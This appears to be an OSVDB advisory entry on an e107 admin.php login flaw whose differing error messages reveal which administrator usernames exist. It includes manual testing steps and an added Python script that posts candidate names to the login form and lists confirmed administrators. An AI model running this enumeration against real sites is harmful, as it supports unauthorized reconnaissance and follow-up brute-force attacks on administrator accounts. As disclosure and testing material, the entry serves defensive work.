e107 admin.php Administrator Account Enumeration

2005-06-12T08:07:15
ID OSVDB:17569
Type osvdb
Reporter Marc Ruef (marc.ruef@computec.ch)
Modified 2005-06-12T08:07:15

Description

Vulnerability Description

e107 contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an attacker attempts to log in to the administration area with a guessed administrator username. The resulting error message differs depending on whether the username exists, allowing the attacker to confirm legitimate administrator accounts without knowing any password. This can be used to launch more focused attacks, such as password brute force attempts against the confirmed accounts.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

e107 contains a flaw that may lead to an unauthorized information disclosure. The admin.php login returns a different error message for valid and invalid administrator usernames, allowing an attacker to enumerate administrator accounts and target them with more focused attacks such as brute force attempts.

Manual Testing Notes

Visit http://<server>/<e107_path>/e107_admin/admin.php and submit the login form with an invalid administrator name and an empty password. Repeat with a known valid administrator name and an empty password. In the first case the error response is "Administrator name not found in database"; for a valid administrator account the response is "Incorrect password". The quoted strings are those of the English language pack; an installation using another language returns translated equivalents, so the reliable check is that the two responses differ from each other rather than that they match this exact wording.
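The following script automates the manual test above. It is an added example written for this entry, not code from the OSVDB record or from the e107 project. It assumes (the entry does not state this, so verify against the live login form) that admin.php reads the POST fields authname, authpass and authsubmit, and it matches on the English error strings quoted in the testing notes. Only the standard library is used.

```python
"""Probe an e107 admin login for the username enumeration behaviour described
in the Manual Testing Notes.

Added example, not code from the OSVDB entry or from the e107 project.
Assumptions not stated in the entry (verify against the live form):
  * e107_admin/admin.php reads the POST fields 'authname', 'authpass'
    and 'authsubmit';
  * the target uses the English language pack, so the error strings
    below appear verbatim in the response body.
"""
import urllib.parse
import urllib.request

# Error strings quoted in the advisory's Manual Testing Notes (English pack).
MSG_NO_SUCH_ADMIN = "Administrator name not found in database"
MSG_BAD_PASSWORD = "Incorrect password"


def classify(body: str) -> str:
    """Map an admin.php response body to 'valid', 'invalid' or 'unknown'.

    'valid' means the server rejected the (empty) password, which per the
    advisory only happens after the username was found in the database.
    'unknown' means neither string appeared: a non-English pack, a patched
    build, or a page that is not the admin login at all.
    """
    if MSG_NO_SUCH_ADMIN in body:
        return "invalid"
    if MSG_BAD_PASSWORD in body:
        return "valid"
    return "unknown"


def build_request(base_url: str, username: str) -> urllib.request.Request:
    """Build the POST that probes one candidate administrator name.

    The password is deliberately empty: the advisory's point is that the
    response already differs before any password is checked.  The field
    names are an assumption (see module docstring).
    """
    data = urllib.parse.urlencode({
        "authname": username,
        "authpass": "",
        "authsubmit": "Login",
    }).encode()
    url = base_url.rstrip("/") + "/e107_admin/admin.php"
    return urllib.request.Request(url, data=data, method="POST")


def probe(base_url: str, username: str, timeout: float = 10.0) -> str:
    """Send one probe and return its classification."""
    req = build_request(base_url, username)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "utf-8"
        body = resp.read().decode(charset, "replace")
    return classify(body)


def enumerate_admins(base_url: str, candidates) -> list:
    """Return the candidates the target confirms as administrator names."""
    return [name for name in candidates if probe(base_url, name) == "valid"]


if __name__ == "__main__":
    import sys

    if len(sys.argv) < 3:
        sys.exit("usage: probe.py http://<server>/<e107_path> name [name ...]")
    for name in sys.argv[2:]:
        print(name, probe(sys.argv[1], name))
```

If classify() reports "unknown" for both a known-bad and a known-good name, the target is not using the English strings; in that case keep the two response bodies and diff them directly, since the flaw is the difference between the two answers, not the wording of either one.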

References:

Vendor URL: http://www.e107.org
Secunia Advisory ID: 15733
Related OSVDB ID: 17570
Related OSVDB ID: 17571
Related OSVDB ID: 17572
Related OSVDB ID: 17573
Nessus Plugin ID: 18222
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0141.html
Bugtraq ID: 13974